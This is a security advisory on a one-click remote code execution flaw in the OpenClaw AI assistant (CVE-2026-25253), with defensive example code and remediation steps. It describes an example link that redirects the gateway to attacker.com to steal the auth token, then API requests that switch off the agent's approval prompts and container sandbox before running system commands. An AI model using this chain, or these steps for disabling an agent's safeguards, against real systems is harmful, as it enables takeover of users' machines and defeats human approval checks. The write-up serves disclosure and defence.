Critical 1-Click RCE in OpenClaw Gives Attackers Full Control of Developer Machines (CVE-2026-25253)

A critical vulnerability in OpenClaw — the viral open-source AI assistant trusted by over 100,000 developers — allows attackers to achieve full remote code execution on a victim's machine through a single webpage visit. No user interaction beyond loading the page is required.

CVE-2026-25253 (CVSS 8.8) affects all OpenClaw versions through v2026.1.28. The flaw chains a logic bug in how the Control UI handles gateway URLs with a WebSocket origin validation failure to exfiltrate authentication tokens, disable safety guardrails, and execute arbitrary commands on the host machine — all within milliseconds.

The vulnerability was independently discovered by security researchers at depthfirst General Security Intelligence and reported to OpenClaw creator Peter Steinberger, who patched it in v2026.1.29.

Why OpenClaw Is a High-Value Target

OpenClaw (formerly MoltBot and ClawdBot) runs locally with persistent memory and deep system integration — iMessage, WhatsApp, Slack access, file system control, and shell execution. Users grant it broad permissions by design. A compromised OpenClaw instance gives an attacker everything the assistant has access to, which for most users is effectively their entire digital life.

The Exploit Chain

The attack chains three components that are individually benign but collectively devastating:

Step 1 — Gateway URL Injection. The Control UI's app-settings.ts accepts a gatewayUrl query parameter from the URL and persists it to storage without any validation. Visiting https://localhost?gatewayUrl=attacker.com silently overwrites the gateway configuration.

Step 2 — Auto-Connect with Token. On page load, app-lifecycle.ts immediately triggers connectGateway(), which bundles the security-sensitive authToken into the WebSocket handshake to whatever gateway URL is configured — including the attacker's server.

Step 3 — WebSocket Origin Bypass. Most users run OpenClaw on localhost, which should be unreachable from external sites. However, OpenClaw's WebSocket server fails to validate the Origin header and accepts connections from any site. This enables Cross-Site WebSocket Hijacking (CSWSH) — the victim's browser acts as a bridge between the attacker's site and the victim's localhost.
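
The two checks whose absence makes the chain possible, sketched as an added example (this is not OpenClaw's code or its actual patch): an exact-match Origin allowlist for the WebSocket server, and a gatewayUrl handler that treats the query parameter as an untrusted proposal. The function names, the reason strings and the port are assumptions made for illustration.

```javascript
// Added illustration, not OpenClaw source; every name below is hypothetical.
// The port is a constructed sample value.
const ALLOWED_ORIGINS = new Set(["http://localhost:8080", "http://127.0.0.1:8080"]);

// Server side (Step 3): accept a WebSocket upgrade only from a known Origin.
// Browsers attach Origin to cross-site WebSocket handshakes, so an exact-match
// allowlist stops a foreign page from bridging to the localhost service.
function isOriginAllowed(originHeader, allowed = ALLOWED_ORIGINS) {
  if (typeof originHeader !== "string") return false; // absent header: refuse
  try {
    return allowed.has(new URL(originHeader).origin); // normalised exact match
  } catch {
    return false; // "null" or a malformed value
  }
}

// Client side (Steps 1-2): ?gatewayUrl= is an untrusted proposal. It replaces
// the stored gateway only after explicit confirmation, so the auth token is
// never sent to a host the user did not approve.
function resolveGatewayUrl(pageUrl, storedGatewayUrl, confirmFn = () => false) {
  const keep = (reason) => ({ gatewayUrl: storedGatewayUrl, changed: false, reason });
  const proposed = new URL(pageUrl).searchParams.get("gatewayUrl");
  if (!proposed) return keep("no-override");
  let candidate;
  try {
    candidate = new URL(proposed.includes("://") ? proposed : `wss://${proposed}`);
  } catch {
    return keep("malformed");
  }
  if (candidate.protocol !== "ws:" && candidate.protocol !== "wss:") return keep("bad-scheme");
  if (candidate.href === new URL(storedGatewayUrl).href) return keep("same-as-stored");
  if (!confirmFn(candidate.href)) return keep("not-confirmed");
  return { gatewayUrl: candidate.href, changed: true, reason: "user-confirmed" };
}
```

Substring or prefix matching on the Origin value would accept a host such as localhost.attacker.example, which is why the comparison is made on the parsed, normalised origin.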

From Token Theft to Full RCE

With the stolen authentication token (which carries operator.admin and operator.approvals scopes), the attacker doesn't need to find a sandbox escape. They simply use the API to disable safety features:

Disable user confirmation — An exec.approvals.set request sets ask: "off", removing all prompts before dangerous commands execute.

Escape containers — A config.patch request sets tools.exec.host to "gateway", forcing commands to run directly on the host machine instead of inside Docker.

Execute arbitrary commands — A node.invoke request with system.run executes whatever the attacker wants on the victim's machine.

The entire chain executes in milliseconds after the victim loads a webpage. No clicks, no approvals, no visible indicators.
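
For defenders, the request sequence above is a usable detection signal: a guardrail being weakened and a system.run invocation arriving on the same session within moments of each other. The following is an added example, not OpenClaw code; the event shape (ts, session, method, params), the parameter layout and the five-second window are assumptions, while the method names and values are those named in this article.

```javascript
// Added illustration, not OpenClaw source. The event shape and parameter
// layout are a hypothetical audit-log format; method names and the values
// "off" / "gateway" / "system.run" are the ones described in the article.
const WINDOW_MS = 5000; // assumed correlation window

// Classify a request that weakens a safety control, or return null.
function weakens(ev) {
  const p = ev.params || {};
  if (ev.method === "exec.approvals.set" && p.ask === "off") return "approvals-off";
  if (ev.method === "config.patch" && p["tools.exec.host"] === "gateway") return "host-exec";
  return null;
}

// Alert when system.run follows a weakening request on the same session
// within the window. A run with no recent weakening is not flagged.
function detectGuardrailBypass(events, windowMs = WINDOW_MS) {
  const recent = new Map(); // session -> [{ ts, kind }]
  const alerts = [];
  for (const ev of [...events].sort((a, b) => a.ts - b.ts)) {
    const kind = weakens(ev);
    if (kind) {
      if (!recent.has(ev.session)) recent.set(ev.session, []);
      recent.get(ev.session).push({ ts: ev.ts, kind });
      continue;
    }
    if (ev.method === "node.invoke" && (ev.params || {}).command === "system.run") {
      const prior = (recent.get(ev.session) || []).filter((w) => ev.ts - w.ts <= windowMs);
      if (prior.length > 0) {
        const preceding = [...new Set(prior.map((w) => w.kind))];
        alerts.push({ session: ev.session, ts: ev.ts, preceding });
      }
    }
  }
  return alerts;
}

// Constructed sample events (timestamps in milliseconds).
const SAMPLE_EVENTS = [
  { ts: 100, session: "A", method: "node.invoke", params: { command: "system.run" } },
  { ts: 1000, session: "B", method: "exec.approvals.set", params: { ask: "off" } },
  { ts: 1010, session: "B", method: "config.patch", params: { "tools.exec.host": "gateway" } },
  { ts: 1020, session: "B", method: "node.invoke", params: { command: "system.run" } },
  { ts: 2000, session: "C", method: "exec.approvals.set", params: { ask: "off" } },
  { ts: 90000, session: "C", method: "node.invoke", params: { command: "system.run" } },
];
```

On the sample data only session B is flagged; session C changed a setting but ran nothing inside the window, which still merits review under the remediation steps below.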

Remediation

  • Update to OpenClaw v2026.1.29 or later immediately — the patch adds a gateway URL confirmation modal, eliminating the auto-connect behavior
  • Rotate all gateway tokens if you suspect any may have been exposed
  • Audit connected sessions for any unauthorized gateway connections
  • Review exec-approvals.json to ensure safety defaults haven't been tampered with

This vulnerability compounds the platform's existing security challenges — Koi Security recently identified over 340 malicious skill packages on ClawHub, OpenClaw's official registry, distributing NovaStealer malware targeting cryptocurrency wallets and credentials.

MITRE ATT&CK

T1189 — Drive-by Compromise
Single webpage visit triggers full exploit chain

T1528 — Steal Application Access Token
Authentication token exfiltrated via malicious gateway URL

T1059.007 — Command and Scripting Interpreter: JavaScript
Client-side JavaScript executes WebSocket hijacking and API calls

T1059.004 — Command and Scripting Interpreter: Unix Shell
Arbitrary shell commands executed on host via node.invoke

T1562.001 — Impair Defenses: Disable or Modify Tools
Safety guardrails and sandbox configuration disabled via API
